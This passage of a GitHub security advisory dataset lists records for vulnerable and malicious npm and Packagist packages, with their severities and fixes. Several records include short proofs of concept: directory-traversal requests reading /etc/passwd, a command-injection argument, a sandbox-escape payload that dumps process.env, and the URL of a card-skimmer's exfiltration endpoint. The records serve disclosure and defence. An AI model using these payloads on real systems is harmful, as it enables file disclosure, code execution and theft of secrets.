+Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.",[],"[{'package': {'ecosystem': 'npm', 'name': 'pm2-kafka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10693'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/299'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gjhx-gxwx-jx9j,2021-09-23T21:33:49Z,2020-09-01T15:35:22Z,,['CVE-2016-1000234'],Cross-Site Scripting in jqtree,"Affected versions of `jqtree` are vulnerable to cross-site scripting in the drag and drop functionality for modifying tree data.
+
+When a user attempts to drag a node to a different position in the hierarchy, script content existing within the node will be executed.
+
+
+## Recommendation
+
+Update to 1.3.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'jqtree'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.3.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000234'}, {'type': 'WEB', 'url': 'https://github.com/mbraak/jqTree/issues/437'}, {'type': 'PACKAGE', 'url': 'https://github.com/mbraak/jqTree'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/132'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9mjp-gv34-3jcf,2021-10-01T13:55:21Z,2020-09-02T18:37:35Z,,[],Malicious Package in aasync,"All versions of `aasync` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aasync'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/844'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-876r-hj45-fw7g,2020-08-31T18:51:25Z,2020-09-03T21:18:41Z,,[],Sandbox Breakout / Arbitrary Code Execution in safer-eval,"All versions of `safer-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. It is possible to escape the sandbox by forcing exceptions recursively in the evaluated code. This may allow attacker to execute arbitrary code in the system.
+
+
+## Recommendation
+
+The package is not suited to receive arbitrary user input. Consider using an alternative package.",[],"[{'package': {'ecosystem': 'npm', 'name': 'safer-eval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1221'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vpgc-7h78-gx8f,2022-09-19T22:54:30Z,2020-09-04T18:05:14Z,,[],personnummer/js vulnerable to Improper Input Validation,"This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.
+
+The vulnerability is determined to be low severity.
+
+### Impact
+
+This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.
+
+### Patches
+
+The issue have been patched in all repositories. The following versions should be updated to as soon as possible:
+
+[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2
+D 3.0.1
+[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3
+Elixir 3.0.0
+[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1
+[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0
+[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0
+Kotlin 1.1.0
+Lua 3.0.1
+[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2
+Perl 3.0.0
+[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2
+[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1
+[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0
+Scala 3.0.1
+Swift 1.0.1
+
+If you are using any of the earlier packages, please update to latest.
+
+### Workarounds
+
+The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be
+000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not
+000x.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)
+* Email us at [Personnummer Email](mailto:security@personnummer.dev)",[],"[{'package': {'ecosystem': 'npm', 'name': 'personnummer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/personnummer/js/security/advisories/GHSA-vpgc-7h78-gx8f'}, {'type': 'PACKAGE', 'url': 'https://github.com/personnummer/js/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/personnummer'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-04T16:24:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-674r-xx4c-gj7x,2021-10-04T14:28:19Z,2020-09-03T17:04:05Z,,[],Malicious Package in sb58,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sb58'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1406'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-563h-49v8-g7x4,2021-10-01T16:10:30Z,2020-09-03T23:17:01Z,,[],Malicious Package in ks-sha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ks-sha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1297'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-779f-wgxg-qr8f,2020-08-31T18:46:16Z,2020-09-03T18:10:22Z,,[],Prototype Pollution in lodash.mergewith,"Versions of `lodash.mergewith` before 4.6.2 are vulnerable to prototype pollution. The function `mergeWith` may allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+Update to version 4.6.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lodash.mergewith'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1071'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m2fp-c79h-rr79,2021-09-30T21:56:28Z,2020-09-02T21:42:56Z,,[],Malicious Package in tensorplow,"All versions of `tensorplow` contain malicious code as a preinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'tensorplow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/910'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-96qc-ghj4-rq27,2023-09-13T20:25:04Z,2020-09-01T18:24:56Z,,['CVE-2017-16219'],Directory Traversal in yttivy,"Affected versions of `yttivy` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'yttivy'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16219'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yttivy'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20201208101732/https://www.npmjs.com/advisories/441'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c722-pv5w-cfg2,2023-07-27T20:17:08Z,2020-09-11T21:20:14Z,,[],Malicious Package in github-jquery-widgets,"Version 0.1.2 of `github-jquery-widgets` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.1.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'github-jquery-widgets'}, 'versions': ['0.1.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/933'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-785g-gx74-gr39,2021-10-01T14:35:20Z,2020-09-03T23:12:48Z,,[],Malicious Package in js-wha3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-wha3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1294'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2r7f-4h2c-5x73,2023-09-11T16:45:35Z,2020-09-01T16:38:33Z,,['CVE-2016-1000249'],fury-adapter-swagger allows arbitrary file read from system,"`fury-adapter-swagger` from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like `/dev/zero`.
+
+## Proof of Concept:
+
+```yaml
+---
+swagger: '2.0'
+info:
+ title: Read local files
+ version: '1.0'
+
+paths:
+ /foo:
+ get:
+ responses:
+ 200:
+ description: Some description
+ examples:
+ text/html:
+ example:
+ $ref: '/etc/passwd'
+```
+
+
+## Recommendation
+
+Upgrade to version 0.9.7 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'fury-adapter-swagger'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.9.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apiaryio/fury-adapter-swagger/pull/89'}, {'type': 'WEB', 'url': 'https://github.com/apiaryio/fury-adapter-swagger/commit/777e2d68f03546a88f3203bbd4725df8b1f662a7'}, {'type': 'WEB', 'url': 'https://github.com/apiaryio/fury-adapter-swagger/commit/f4407e3a5323bc31123d45dbc93b8417002e4d51#diff-54c345dc104dc19440f9c2482b7883df820e8b9b699fdd8fa07e2773e7197a29'}, {'type': 'PACKAGE', 'url': 'https://github.com/apiaryio/fury-adapter-swagger'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/npm:fury-adapter-swagger:20161024'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/305'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:18:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-25v4-mcx4-hh35,2020-08-31T18:59:41Z,2020-09-04T17:28:28Z,,[],Cross-Site Scripting in atlasboard-atlassian-package,"All versions of `atlasboard-atlassian-package` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly sanitize user input that is rendered as HTML, which may allow attackers to execute arbitrary JavaScript in a victim's browser. This requires attackers being able to change issue summaries in Jira tickets.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'atlasboard-atlassian-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/456702'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1449'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mvch-rh6h-2m47,2021-10-01T14:09:54Z,2020-09-11T21:10:29Z,,[],Malicious Package in equest,"All versions of `equest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'equest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/867'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h5mp-5q4p-ggf5,2020-08-31T18:46:09Z,2020-09-03T18:07:05Z,,[],Prototype Pollution in lodash.defaultsdeep,"Versions of `lodash.defaultsdeep` before 4.6.1 are vulnerable to prototype pollution. The function `mergeWith` may allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+Update to version 4.6.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lodash.defaultsdeep'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1068'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xfmw-2vmm-579c,2023-09-05T23:05:17Z,2020-09-01T18:59:50Z,,['CVE-2017-16080'],Nodesass is malware,"The `nodesass` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
+
+All versions have been unpublished from the npm registry.
+
+
+## Recommendation
+
+As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
+
+If you have found this installed in your environment, you should:
+1. Delete the package
+2. Clear your npm cache
+3. Ensure it is not present in any other package.json files on your system
+4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
+
+Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well.",[],"[{'package': {'ecosystem': 'npm', 'name': 'nodesass'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16080'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20201208091202/https://www.npmjs.com/advisories/519'}]","{'cwe_ids': ['CWE-506'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:26:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5vj8-3v2h-h38v,2022-04-28T19:57:43Z,2020-09-04T18:04:08Z,,[],Remote Code Execution in next,"Versions of `next` prior to 5.1.0 are vulnerable to Remote Code Execution. The `/path:` route fails to properly sanitize input and passes it to a `require()` call. This allows attackers to execute JavaScript code on the server. Note that prior version 0.9.9 package `next` npm package hosted a different utility (0.4.1 being the latest version of that codebase), and this advisory does not apply to those versions.
+
+## Recommendation
+
+Upgrade to version 5.1.0.",[],"[{'package': {'ecosystem': 'npm', 'name': 'next'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.9'}, {'fixed': '5.1.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/vercel/next.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1538'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:02:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fqw7-8v6m-2f86,2021-09-30T21:54:46Z,2020-09-02T21:37:39Z,,[],Malicious Package in hulp,"All versions of `hulp` contain malicious code as a preinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'hulp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/905'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g7h8-p22m-2rvx,2020-08-31T18:55:16Z,2020-09-04T15:08:46Z,,[],Prototype Pollution in flat-wrap,"All versions of `flat-wrap` are vulnerable to prototype pollution. The function `unflatten` does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'flat-wrap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1327'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hfq9-rfpv-j8r8,2021-09-23T21:42:30Z,2020-09-01T16:49:19Z,,['CVE-2017-16034'],Command Injection in pidusage,"Affected versions of `pidusage` pass unsanitized input to `child_process.exec()`, resulting in arbitrary code execution in the `ps` method.
+
+This package is vulnerable to this PoC on Darwin, SunOS, FreeBSD, and AIX.
+
+Windows and Linux are not vulnerable.
+
+## Proof of Concept
+```
+var pid = require('pidusage');
+pid.stat('1 && /usr/local/bin/python');
+```
+
+
+## Recommendation
+
+Update to version 1.1.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'pidusage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.4'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16034'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/356'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qvhr-55hg-3qwv,2021-10-04T21:20:31Z,2020-09-23T17:20:39Z,,[],Non-persistent XSS in the Storefront in Shopware,"### Impact
+Non-persistent XSS in the Storefront
+
+### Patches
+We recommend to update to the current version 6.3.1.1. You can get the update to 6.3.1.1 regularly via the Auto-Updater or directly via the download overview.
+
+For older versions you can use the Security Plugin:
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### References
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-09-2020",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-qvhr-55hg-3qwv'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-09-2020'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-23T15:02:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jp99-5h8w-gmxc,2020-08-31T18:55:02Z,2020-09-04T15:03:13Z,,[],Sandbox Breakout / Arbitrary Code Execution in @zhaoyao91/eval-in-vm,"All versions of `@zhaoyao91/eval-in-vm` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': '@zhaoyao91/eval-in-vm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1320'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4hjg-w3ww-38c6,2021-09-30T20:01:59Z,2020-09-03T18:03:49Z,,[],Malicious Package in tiar,"All versions of `tiar` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'tiar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1064'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-388g-jwpg-x6j4,2021-09-28T17:00:22Z,2020-09-11T21:20:14Z,,[],Cross-Site Scripting in swagger-ui,"Versions of `swagger-ui` prior to 3.0.13 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize YAML files imported from URLs or copied-pasted. This may allow attackers to execute arbitrary JavaScript.
+
+
+## Recommendation
+
+Upgrade to version 3.0.13 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/3163'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SWAGGERUI-449941'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/985'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5p98-wpc9-g498,2022-06-22T19:28:32Z,2020-09-04T15:21:32Z,,[],Server-Side Request Forgery in html-pdf-chrome,"## Recommendation
+This package is working as intended. A [Security](https://github.com/westy92/html-pdf-chrome#security) section has been added since v0.6.1 to detail proper usage of this library. Npm has revoked their advisory altogether.
+
+## Original Advisory
+All versions of `html-pdf-chrome` are vulnerable to Server-Side Request Forgery (SSRF). The package executes HTTP requests if the parsed HTML contains external references to resources, such as ``. This allows attackers to access resources through HTTP that are accessible to the server, including private resources in the hosting environment.",[],"[{'package': {'ecosystem': 'npm', 'name': 'html-pdf-chrome'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/westy92/html-pdf-chrome/issues/249'}, {'type': 'PACKAGE', 'url': 'https://github.com/westy92/html-pdf-chrome'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1339'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vv52-3mrp-455m,2020-08-31T19:01:56Z,2020-09-03T15:53:36Z,,[],Malicious Package in m-backdoor,"All versions of `m-backdoor` contain malicious code. The package downloads a file from a remote server and executes it as a preinstall script. At the time of the release of this advisory the downloaded file only defaces websites by removing elements randomly from the DOM.
+
+
+## Recommendation
+
+Remove the package from your system.",[],"[{'package': {'ecosystem': 'npm', 'name': 'm-backdoor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1513'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:56Z', 'nvd_published_at': None}"
